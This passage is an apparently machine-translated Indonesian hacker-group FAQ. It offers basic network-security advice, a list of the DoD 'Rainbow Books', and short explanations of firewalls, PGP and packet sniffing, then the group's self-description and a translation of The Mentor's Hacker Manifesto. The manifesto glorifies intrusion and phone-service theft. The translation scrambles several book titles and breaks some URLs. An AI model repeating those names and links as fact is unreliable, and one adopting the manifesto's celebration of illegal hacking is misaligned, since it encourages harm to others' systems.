     Tentukan siapa sistem komputer harus dipertahankan.
     Tentukan kemungkinan ancaman.
     Menerapkan tindakan untuk melindungi sumber daya jaringan.


3. Pertimbangkan anggaran perusahaan ketika merencanakan untuk Internet Security.


4. Desain Kebijakan Keamanan yang menjelaskan keamanan jaringan organisasi Anda
keprihatinan. Kebijakan ini harus mempertimbangkan hal berikut:


     Keamanan Jaringan Perencanaan
     Keamanan Situs Kebijakan
     Analisis Risiko
     Analisis risiko mencakup menentukan berikut:
          Apa yang perlu untuk melindungi
          Apa yang perlu untuk melindunginya dari
          Bagaimana untuk melindunginya
          Memperkirakan resiko kehilangan sumber daya
          Memperkirakan pentingnya sumber daya


5. Pertimbangkan faktor-faktor berikut untuk menentukan siapa yang akan memberikan akses ke layanan pada Anda
jaringan:
     Akan mengakses ke layanan diberikan dari titik pusat?
     Metode apa yang akan Anda gunakan untuk membuat account dan menghentikan akses?


6. Merancang dan Menerapkan Aturan Packet Filter


7. Pastikan Firewall Anda memiliki properti berikut:
     Semua lalu lintas dari dalam ke luar, serta luar ke dalam harus melalui
     firewall.
     Mengizinkan hanya lalu lintas yang berwenang sebagaimana didefinisikan oleh kebijakan keamanan perusahaan Anda menjadi
     melewati firewall.
     Pastikan firewall yang kebal terhadap penetrasi.


8. Mendidik pengguna tentang proteksi password:
     Mendidik pengguna untuk tidak menggunakan password yang mudah ditebak.
     Memastikan panjang password yang memadai.
     Menjalankan penerka password.
     Membutuhkan penggunaan password generator.
     Selalu menggunakan campuran karakter huruf besar dan huruf kecil.
     Selalu menggunakan setidaknya satu atau dua karakter non-alfanumerik.
     Jangan pernah menggunakan kata-kata kamus atau yang dieja terbalik.
     Jangan pernah menggunakan sebagian atau variasi dari alamat, nama atau apapun yang tepat
     jelas bisa mengidentifikasi Anda (pengguna).


9. Keamanan yang berhubungan dengan organisasi memainkan peran integral dalam pengembangan dan
penyebaran teknologi internet. Mengikuti perkembangan terbaru dalam berhubungan dengan keamanan
kegiatan dengan mengunjungi situs Web mereka. Berikut adalah beberapa keamanan-rated kunci organisasi
yang membantu perusahaan seperti milik Anda dalam menjaga internet tempat yang lebih aman untuk menghitung:
     ACM / SIGSAC di gopher :/ / gopher.acm.org /.
     CERT (24-jam Computer Emergency Response Team) di:
     ftp://info.cert.org/pub/cert_faq dan
     http://www.sei.cmu.edu/SEI/programs/cert.html.
     CIAC (US Department of Energy Insiden Komputer Penasehat
     Kemampuan) di: http://ciac.llnl.gov/
     CPSR (Komputer Profesional untuk Tanggung Jawab Sosial) di:
     http://cpsr.org.home
     EFF (Electronic Frontier Foundation) di: http://www.eff.org/~~V
     EPIC (Pusat Informasi Privasi Elektronik) di: http:/epic.org/
     PERTAMA (Forum respon Insiden dan Tim Keamanan) di:
     http://first.org/first/~~V
     Internet Society di http://www.isoc.org/~~V


T. Apa yang dimaksud dengan "buku pelangi?"


A. Rainbow Buku adalah buku tentang keamanan. Daftar buku saat ini tercantum di bawah ini.


Oranye Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer.
Buku hijau-Departemen Pedoman Manajemen Password Pertahanan.
Kuning Buku-Panduan untuk Menerapkan Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer di Lingkungan Tertentu.
Buku-A Tan Panduan untuk Memahami Audit dalam Sistem Trusted.
Buku-A Biru terang Panduan untuk Vendor.
Neon Oranye Buku-Panduan untuk Memahami Discretionary Access Control dalam Sistem Trusted.
Teal Hijau Buku-Daftar Istilah Keamanan Komputer.
Buku Merah-Trusted Interpretasi Network dari Kriteria Evaluasi Sistem Komputer Trusted.
Burgandy Buku-Panduan untuk Memahami Dokumentasi dalam Sistem Desain Trusted.
Buku-A Lavender gelap Panduan untuk Memahami Distribusi Trusted dalam Sistem Trusted.
Venice Buku Biru-Keamanan Komputer Subsistem Interpretasi Kriteria Evaluasi Sistem Komputer Trusted.
Aqua Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Memahami Modeling Keamanan dalam Sistem Trusted.
Dark Red Book-Pedoman Penerapan Interpretasi Jaringan Trusted.
Merah muda Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Tahap Penilaian Pemeliharaan.
Ungu Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Pedoman Sistem Verifikasi Formal.
Brown Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Memahami Manajemen Fasilitas Trusted.
Kuning-Hijau Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Pedoman Penulisan Manual Fasilitas Trusted.
Cahaya Buku-Blue Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Memahami Identifikasi dan Otentikasi dalam Sistem Trusted.
Buku Biru-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Trusted Kuesioner Evaluasi Produk.
Abu-abu Buku-Departemen Pertahanan Trusted Kriteria Evaluasi Sistem Komputer Trusted Unix Working Group (TRUSIX) Alasan Pemilihan Fitur Access Control List untuk Sistem Unix.
Kriteria Evaluasi Sistem Komputer Lavender Buku-Departemen Pertahanan Terpercaya Trusted Data Base Manajemen Sistem Interpretasi dari Kriteria Evaluasi Sistem Komputer Trusted.
Terang Buku-Orange Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Understandng Pengujian Keamanan dan Dokumentasi Uji dalam Sistem Trusted.
Peach Hot Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Menulis Keamanan Fitur Panduan Pengguna untuk Sistem Trusted.
Turquoise Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Memahami Sistem Informasi Tanggung Jawab Petugas Keamanan Sistem Informasi Otomatis.
Violet Buku-Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Menilai Controlled Access Protection.
Cahaya Buku Departemen-Pink Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Sebuah Panduan untuk Memahami Analisis Saluran Terselubung Sistem Trusted.
Laporan Teknis C1-001-Departemen Pertahanan Trusted Komputer Kriteria Evaluasi Sistem Komputer Virus: Pencegahan, Deteksi, dan Pengobatan.
C Laporan Teknis 79-91 - Departemen Pertahanan Trusted Komputer Sistem Evaluasi Kriteria Integritas dalam Sistem Informasi Otomatis.
C Laporan Teknis 39-92 - Departemen Pertahanan Terpercaya Kriteria Evaluasi Sistem Komputer Desain dan Evaluasi INFOSEC sistem: The Kontribusi Keamanan Komputer ke Diskusi Komposisi.
NTISSAM COMPUSEC/1-87- Departemen Pertahanan Komputer Sistem Trusted Nota Kriteria Evaluasi Penasehat Pedoman Otomasi Kantor Keamanan.






T. Apakah firewall?


A. firewall adalah sebuah sistem atau sekelompok sistem yang memaksa kebijakan kontrol akses antara dua jaringan. Yaitu sarana dengan mana ini dicapai sangat bervariasi, tetapi pada prinsipnya, firewall dapat dianggap sebagai sepasang mekanisme: satu yang ada untuk memblokir lalu lintas, dan yang lainnya yang ada untuk memungkinkan lalu lintas. Beberapa firewall menempatkan penekanan lebih besar pada memblokir lalu lintas, sementara yang lain menekankan memungkinkan lalu lintas. Mungkin hal yang paling penting untuk mengenali tentang firewall adalah bahwa menerapkan kebijakan kontrol akses. Jika Anda tidak memiliki ide yang baik jenis akses yang akan mengizinkan atau menolak, atau Anda mengizinkan seseorang atau beberapa produk untuk mengkonfigurasi
firewall berdasarkan apa yang mereka atau pikir itu harus lakukan, maka mereka membuat kebijakan untuk organisasi Anda secara keseluruhan.




T. Bagaimana cara menggunakan PGP untuk menguntungkan saya?


A. PGP mudah digunakan, hal ini memberikan tali cukup sehingga Anda dapat meletakkan diri sendiri. Anda harus
menjadi benar-benar akrab dengan berbagai pilihan di PGP sebelum menggunakannya untuk mengirim serius
pesan. Misalnya, memberikan perintah pgp-sat <filename> hanya akan menandatangani sebuah pesan, itu
tidak akan mengenkripsi itu. Meskipun output seperti itu dienkripsi, sebenarnya tidak. Siapa saja di
dunia akan dapat memulihkan teks asli.


T. Apa yang dimaksud dengan sniffer?


A. Diambil dari FAQ sapu tangan.
Tidak seperti sirkuit telepon, jaringan komputer dibagi saluran komunikasi. Itu terlalu mahal untuk mendedikasikan loop lokal ke switch (hub) untuk setiap pasangan berkomunikasi komputer. Berbagi berarti bahwa komputer dapat menerima informasi yang seharusnya ditujukan untuk mesin lainnya. Untuk mengambil informasi yang melalui suatu jaringan disebut dengan sniffing.


Cara yang paling populer untuk menghubungkan komputer adalah melalui ethernet. Protokol Ethernet bekerja dengan mengirimkan paket informasi ke seluruh host di sirkuit yang sama. Header paket berisi alamat yang tepat dari mesin tujuan. Hanya mesin dengan alamat yang cocok tersebut yang akan menerima paket tersebut. Sebuah mesin yang menerima semua paket, tidak peduli apa header paket mengatakan, dikatakan dalam modus promiscuous.


Karena, dalam lingkungan jaringan normal, account dan password informasi dilewatkan bersama
ethernet di jelas-teks, tidaklah sulit bagi penyusup setelah mereka mendapatkan root untuk menempatkan mesin ke
promiscuous mode dan dengan mengendus, membahayakan semua mesin di internet.




T. Apakah psikotik?


A. Saya akan menjelaskan psikotik sebagai lebih dari kelompok proffessional bukan hanya klan hacking. Kami berpikir tentang kedua uang pertama dan hacking, meskipun saya yakin bahwa sebagian dari Anda telah melihat beberapa proyek hack kami ...


T. Apakah psikotik mencari anggota baru?


A. Yah seperti yang sekarang kita tidak mencari untuk setiap penambahan staf kami, tapi tetap diposting kita mungkin memutuskan bahwa kita perlu anggota baru.


T. Apakah Psikosis?


Psikosis A. adalah sebuah proyek pribadi diambil oleh Virtual Circuit. Ini adalah penghargaan yang ia memberikan kepada hacker yang telah melakukan sesuatu untuk berdiri keluar (halaman web yang baik, eksploitasi mengungkapkan, dll). Jika Anda berpikir bahwa Anda akan menerima penghargaan Anda dapat mail kepadanya tentang hal itu. Tapi saya dapat memberitahu Anda sekarang bahwa penghargaan itu tidak mudah untuk mendapatkan.


T. Apakah "Gateway Iblis?"


A. "Gateway Setan" adalah sebuah proyek pribadi diambil oleh VooDooHex. Ini semacam seperti serikat informasi retrival, tetapi namun masih seperti sebuah kelompok. Jika anda tertarik untuk bergabung Gateway Iblis Anda harus mengirimkan voodoo tentang hal itu.


T. Di mana saya dapat menemukan beberapa sumber yang baik pada hacking dan phreaking?


A. Nah kita tidak banyak untuk link, tetapi Anda harus memeriksa halaman Psikosis untuk pemenang halaman web nya penghargaan. Dia memilih hanya yang terbaik.


Q. Siapakah semua anggota di psikotik?


A. Kami ingin tetap anonim. Tapi Anda akan melihat nama anggota setiap sekarang dan kemudian.


T. Apa layanan psikotik yang ditawarkan?


A. psikotik memiliki layanan yang berbeda, uji keamanan, desain halaman web, desain grafis, mensponsori, rekening pop, dan hosting halaman web. Setiap layanan memiliki harga yang berbeda. Anda dapat membaca lebih lanjut tentang layanan kami di bagian layanan halaman.




Ini hanya salinan dari fisrt FAQ kami. Kami akan memperbarui dan menambahkan informasi dan pertanyaan untuk sesering mungkin. Saya akan appriciate jika Anda akan mendistribusikan dan spready teks ini sebanyak yang Anda bisa. Kami tidak ingin orang meminta kami pertanyaan-pertanyaan lagi. Bersenang-senang dan menjaga hidup bawah tanah.




Satu lagi tertangkap hari ini, itu semua surat kabar. "Remaja Ditangkap di Komputer
   Kejahatan Skandal "," Hacker Ditangkap setelah Bank Merusakkan "Sialan ... anak-anak. Mereka semua
  sama. Tapi apakah Anda, dalam tiga potong psikologi dan technobrain 1950-an, pernah mengambil
 melihat di balik mata hacker? Apakah Anda pernah bertanya-tanya apa yang membuatnya centang, apa yang memaksa
 berbentuk dia, apa yang mungkin telah membentuk dia? Aku memang seorang hacker, memasuki dunia saya ... Tambang adalah dunia
  yang diawali dengan sekolah ... Saya lebih pintar dari sebagian besar anak-anak lain, omong kosong ini mereka mengajarkan kita
  membosankan ... Kembali Sialan underachiever.They 'semua sama. Saya di sekolah menengah atau SMP. Aku sudah
 mendengarkan guru menjelaskan untuk kali kelima belas bagaimana mengurangi pecahan. Saya memahaminya.
 "Tidak, Bu Sita, saya tidak menunjukkan pekerjaan saya, saya melakukannya kepala ... inmy." Sialan anak. Mungkin disalin
  itu. Mereka semua sama. Saya membuat penemuan hari ini. Saya menemukan sebuah komputer. Tunggu dulu, ini adalah
   keren. Ia melakukan apa yang saya inginkan. Jika itu membuat kesalahan, itu karena aku mengacaukannya. Tidak
  karena tidak seperti saya ... Atau merasa terancam oleh saya .. Atau menganggap saya sok pintar .. Atau
tidak suka mengajar dan tidak boleh di sini ... Sialan anak. Semua yang dia lakukan adalah bermain game. Mereka
 semua sama. Dan kemudian hal itu terjadi ... pintu dibuka untuk dunia ... bergegas melalui saluran telepon
   seperti heroin melalui pembuluh darah pecandu, sebuah pulsa elektronik dikirim keluar, tempat perlindungan dari
    hari-hari incompetencies dicari ... papan sudah ditemukan. "Ini dia ... ini adalah tempat saya
 milik ... "Saya tahu semua orang di sini ... meskipun aku belum pernah bertemu mereka, tidak pernah berbicara dengan mereka, mungkin
  tidak pernah mendengar dari mereka lagi ... Saya tahu Anda semua ... Sialan anak. Mengikat saluran telepon lagi.
  Mereka semua sama ... Anda bertaruh pantat Anda kita semua sama ... kita sudah disuapi makanan bayi di
  sekolah ketika kita lapar untuk steak ... potongan-potongan daging yang kamu membiarkan lolos adalah
 pra-dikunyah dan hambar. Kami telah didominasi oleh sadis, atau diabaikan oleh apatis.
 Beberapa yang memiliki sesuatu untuk mengajar murid menemukan kami bersedia, tapi beberapa orang seperti tetes
  air di padang pasir. Ini adalah dunia kami sekarang ... dunia elektron dan switch,
  keindahan baud. Kami menggunakan layanan yang sudah ada tanpa membayar apa
 bisa menjadi sangat murah jika tidak dijalankan oleh orang rakus keuntungan, dan Anda menghubungi kami penjahat. Kita
 mengeksplorasi ... dan Anda hubungi kami penjahat. Kita berusaha mencari pengetahuan ... dan Anda hubungi kami penjahat.
  Kami ada tanpa warna kulit, tanpa kebangsaan, tanpa bias agama ... dan Anda hubungi kami
 penjahat. Anda membangun bom atom, Anda berperang, Anda pembunuhan, cheat, dan berbohong kepada kami dan mencoba
 untuk membuat kita percaya itu demi kebaikan kita sendiri, namun kita adalah penjahat. Ya, saya seorang kriminal. Saya
  kejahatan adalah rasa ingin tahu. Kejahatanku adalah menilai orang lain dari apa yang mereka katakan dan berpikir,
 bukan apa yang mereka terlihat seperti. Kejahatanku adalah bahwa pintar dari Anda, sesuatu yang Anda tidak akan pernah
  maafkan saya karena. Aku memang seorang hacker, dan inilah manifesto saya. Anda bisa saja menghentikanku, tetapi
                   Anda tidak dapat menghentikan kami semua ... setelah semua, kita semua sama.


                              + + + The Mentor + + +